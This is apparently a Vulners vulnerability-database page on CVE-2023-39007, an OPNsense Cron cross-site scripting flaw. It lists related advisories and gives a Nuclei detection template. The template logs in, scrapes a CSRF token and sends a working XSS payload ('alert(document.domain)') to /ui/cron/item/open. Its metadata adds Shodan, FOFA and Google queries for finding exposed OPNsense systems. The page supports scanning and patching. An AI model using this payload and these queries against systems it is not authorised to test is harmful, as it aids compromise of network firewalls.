| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2023-39007 | 9 Aug 202319:15 | – | attackerkb | |
| CVE-2023-39007 | 9 Aug 202322:15 | – | circl | |
| Deciso OPNsense Cross-Site Scripting Vulnerability | 9 Aug 202300:00 | – | cnnvd | |
| CVE-2023-39007 | 9 Aug 202300:00 | – | cve | |
| CVE-2023-39007 | 9 Aug 202300:00 | – | cvelist | |
| Vulnerabilities fixed in OPNSense | 11 Aug 202300:00 | – | ncsc | |
| CVE-2023-39007 | 9 Aug 202319:15 | – | nvd | |
| Design/Logic Flaw | 9 Aug 202319:15 | – | prion | |
| PT-2023-26733 · Opnsense · Opnsense Community Edition +1 | 9 Aug 202300:00 | – | ptsecurity | |
| CVE-2023-39007 | 9 Aug 202300:00 | – | vulnrichment |
| Source | Link |
|---|---|
| logicaltrust | www.logicaltrust.net/blog/2023/08/opnsense.html |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2023-39007 |
id: CVE-2023-39007
info:
name: OPNsense - Cross-Site Scripting to RCE
author: ritikchaddha
severity: critical
description: |
There is a XSS in /ui/cron/item/open in the Cron component of OPNsense Community Edition before 23.7 and Business Edition before 23.4.2 via openAction in app/controllers/OPNsense/Cron/ItemController.php.
impact: |
Authenticated attackers can inject malicious JavaScript through the Cron item opening functionality, potentially escalating to remote code execution and compromising the entire firewall/router system and network security.
remediation: |
Update OPNsense Community Edition to version 23.7 or later, or Business Edition to version 23.4.2 or later that properly sanitizes input in the Cron ItemController.
reference:
- https://logicaltrust.net/blog/2023/08/opnsense.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-39007
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
cvss-score: 9.6
cve-id: CVE-2023-39007
cwe-id: CWE-79
epss-score: 0.02315
epss-percentile: 0.81333
cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: opnsense
product: opnsense
shodan-query:
- title:"OPNsense"
- http.title:"opnsense"
fofa-query: title="opnsense"
google-query: intitle:"opnsense"
tags: cve2023,cve,opnsense,xss,authenticated,rce,vuln
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1
- |
GET /ui/cron/item/open/0'+alert(document.domain)+' HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- "openDialog('0'+alert(document.domain)+''"
- type: word
part: header_3
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
name: para
part: body
group: 1
regex:
- 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="'
internal: true
- type: regex
name: value
part: body
group: 2
regex:
- 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="'
internal: true
# digest: 4b0a00483046022100a03294d7c6dae765ab1cb9bc955c16b0a1b67c7dc65bdd6574aa7592d08ce74b022100886aae0e20cec54899eb0ac1b79019fb93fe647b39b230724e1f53c99df1c193:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation